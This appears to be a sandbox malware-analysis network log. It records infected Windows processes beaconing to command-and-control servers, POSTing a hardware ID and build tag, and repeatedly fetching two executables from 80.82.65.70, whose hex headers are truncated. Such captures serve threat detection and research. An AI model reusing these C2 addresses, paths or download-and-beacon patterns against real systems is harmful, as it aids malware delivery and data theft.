Dec 10, 2024 00:44:34.123704910 CET	1236	IN	Data Raw: c0 da 67 42 4f 24 35 da 00 c2 9f 29 69 11 0c 49 94 a6 a7 92 c3 e7 14 45 de 79 b3 d8 e2 24 85 e6 7e c2 2a ec 32 fa 5b b8 db e4 ea 7c 97 4e cb e1 cc b0 1d f4 fb a3 05 75 fa 46 d0 b4 ab dc eb 81 ad f1 f2 0d 38 68 4a c0 b6 50 cd d7 bc 1f fb 5d 2b cf Data Ascii: gBO$5)iIEy$~*2[\|NuF8hJP]+P\|;3a__JnSgph=jkKOT3e13USC'{XJdey_ p[P<M%5:,rFTgYIR)"<N3ei-IQvtB
Dec 10, 2024 00:44:34.123717070 CET	1236	IN	Data Raw: ed f5 bb 67 1c b0 2e 96 1b 41 e2 4b e0 d0 c0 32 d7 54 d0 57 51 be 23 33 85 40 1d 3e 06 84 94 eb 5a 77 62 51 fd 8a 8b fe 9b 5e 14 3c 3b b6 5d 0d 8f 18 29 53 7a e3 4a 54 9e 1e 8f c8 d7 2e 61 9b 87 bb e4 ef bd c8 ac 33 94 fa df 50 e0 e1 f7 4e ef 39 Data Ascii: g.AK2TWQ#3@>ZwbQ^<;])SzJT.a3PN9Yn(X"h!rrn~O+;}?jjo-?1RXUC\|B\n2/}=.H,/Ta@IEh8\|[cbNVNzcY".n$GA
Dec 10, 2024 00:44:34.123727083 CET	1236	IN	Data Raw: 1a 2a 62 b4 ae 8a 5b 82 f2 2e 8d 4c f7 bc 4a 54 d2 2f 9c 5e d2 78 32 e3 23 07 42 8b dd c1 ad 98 37 2e 4a db d1 95 b9 bb 1a f0 cf e7 16 4b fc ec 93 ab e6 08 7e 4b 49 dc 0d 53 c5 8e 5f f2 c2 11 55 dc 53 1e 24 d4 8f 7e fa 25 60 68 8f b2 67 bd 27 d8 Data Ascii: b[.LJT/^x2#B7.JK~KIS_US$~%`hg'?CW[MQHSB-v0< c\tMc[T4Auxxc+hMgC]`=o8M}k+B[5Nx62G(%OrKv5H0Uq`42p0;U&
Dec 10, 2024 00:44:34.131793022 CET	1236	IN	Data Raw: 40 1b 4a eb 32 76 5f d3 fb 39 60 50 11 2c ac 7f 75 d5 41 17 9a ba 9a a5 65 e4 39 e7 ee 7b 3f e7 8d d7 54 c2 a5 72 c0 54 8a a5 b2 41 0c fc b8 f8 a6 99 6c 72 12 a8 98 67 28 3b fc fc c1 a9 30 6d fe 11 b8 f9 56 53 85 81 29 cb 26 d1 c8 94 83 58 a5 3c Data Ascii: @J2v_9`P,uAe9{?TrTAlrg(;0mVS)&X<V\/Z~_Jp;JOU6VQ9_n-\jsk7rixa#vyC\<7ws583v=w,"Zf`>]6%""4Y8}p+[a
Dec 10, 2024 00:44:34.131890059 CET	1120	IN	Data Raw: 2b 67 00 6f 36 93 8b 8f 53 25 a3 ee f6 cc 1a d2 6d 3a a3 c7 1f 80 c8 43 65 da 7d 01 a3 c8 c6 08 e5 c2 f8 af 3d 9e 77 c1 ae 46 51 3f 02 02 8d 16 23 36 00 5e 2a 1d fc e1 36 a7 cc 4b 30 26 1d 8f 5f 45 f5 89 69 ff aa 98 7d 6d 1c a5 a0 d0 73 f1 10 df Data Ascii: +go6S%m:Ce}=wFQ?#6^6K0&_Ei}ms' 0u't0h[9wBN:DGT;^WbIYzFs=fu.itu C{`94gkda6U#VoTT<{T
Dec 10, 2024 00:44:34.139796972 CET	1236	IN	Data Raw: c4 2b ef bd 7d 2c 43 08 ed 7b 6b 29 6e 0e 1f c4 b7 82 38 dd 6c d9 86 f4 10 35 b0 a5 85 fc 11 b1 d2 2f 8d 77 64 e2 a9 08 d7 d5 3c d2 4a 6a 78 59 69 0f 6c e4 a9 b3 24 c6 f4 58 9a 23 39 7d c7 13 4c f7 63 fc 1e b2 57 02 df 46 1e fd 6d 66 5c 34 7b 69 Data Ascii: +},C{k)n8l5/wd<JjxYil$X#9}LcWFmf\4{iEd"Fl@=l5scroIjyjGEQAQ.b3zH;7[R?b&=Z}BH(-uKDnVc]F?`(&z=eSO'gu)
Dec 10, 2024 00:44:34.796021938 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:44:35.286461115 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:34 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 10, 2024 00:44:37.351912022 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:44:37.839934111 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:37 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 10, 2024 00:44:39.849409103 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:44:40.335913897 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:40 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 10, 2024 00:44:42.367675066 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:44:42.850377083 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:42 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 10, 2024 00:44:44.862911940 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:44:45.347176075 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:45 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 10, 2024 00:44:47.369692087 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:44:47.883662939 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:47 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 10, 2024 00:44:49.909332991 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:44:50.397670031 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:50 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 10, 2024 00:44:52.424911976 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:44:52.922976017 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:52 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 10, 2024 00:44:54.944802046 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:44:55.473313093 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:55 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 10, 2024 00:44:57.500401974 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:44:57.984754086 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:57 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=88 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 10, 2024 00:45:00.003705025 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:45:00.486006975 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:45:00 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=87 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 10, 2024 00:45:03.518099070 CET	392	OUT	GET /soft/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: d Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:45:04.160175085 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:45:03 GMT Server: Apache/2.4.58 (Ubuntu) Content-Disposition: attachment; filename="dll"; Content-Length: 242176 Keep-Alive: timeout=5, max=86 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}:s(2rp(;&Vrprp(>}(Co(D(E}(F(E(G&>}(Co(D}(F(E(H&">}R} { oo{ "}!{!}{#{op{,{ oo{!oo{*Bsu
Dec 10, 2024 00:45:04.679657936 CET	392	OUT	GET /soft/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: s Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:45:05.414290905 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:45:04 GMT Server: Apache/2.4.58 (Ubuntu) Content-Disposition: attachment; filename="soft"; Content-Length: 1502720 Keep-Alive: timeout=5, max=85 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_"00O `@ @`LOO` 0O H.text/ 0 `.rsrc`2@@.reloc @BOHh~DU ((~-rp(os~~j(r=p~otj(rMp~otj(rp~otj(rp~otj(rp~otj(rp~otj(rp~ot~(Vs(tN(((0f(8Mo9:oo-a

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	50079	185.215.113.206	80	8176	C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:32.393343925 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:44:33.771045923 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 10, 2024 00:44:33.779032946 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCG Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 36 34 39 46 42 30 46 45 31 35 34 33 32 30 37 36 30 33 31 36 34 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 2d 2d 0d 0a Data Ascii: ------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="hwid"9649FB0FE1543207603164------IIEBGIDAAFHIJJJJEGCGContent-Disposition: form-data; name="build"stok------IIEBGIDAAFHIJJJJEGCG--
Dec 10, 2024 00:44:34.223078966 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:44:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	50080	185.215.113.43	80	7632	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:33.125710011 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 10, 2024 00:44:34.486629963 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Dec 2024 23:44:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.4	50099	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:44:35.714008093 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 10, 2024 00:44:36.825144053 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 09 Dec 2024 12:18:23 GMT Age: 41173 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 10, 2024 00:44:37.109019041 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 10, 2024 00:44:37.425668001 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 09 Dec 2024 12:18:23 GMT Age: 41174 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 10, 2024 00:44:37.482681036 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 10, 2024 00:44:37.798985004 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 09 Dec 2024 12:18:23 GMT Age: 41174 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 10, 2024 00:44:37.968028069 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 10, 2024 00:44:38.283948898 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 09 Dec 2024 12:18:23 GMT Age: 41175 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 10, 2024 00:44:38.563323975 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 10, 2024 00:44:38.880367994 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 09 Dec 2024 12:18:23 GMT Age: 41175 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 10, 2024 00:44:39.297128916 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 10, 2024 00:44:39.612927914 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Mon, 09 Dec 2024 12:18:23 GMT Age: 41176 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 10, 2024 00:44:39.973916054 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
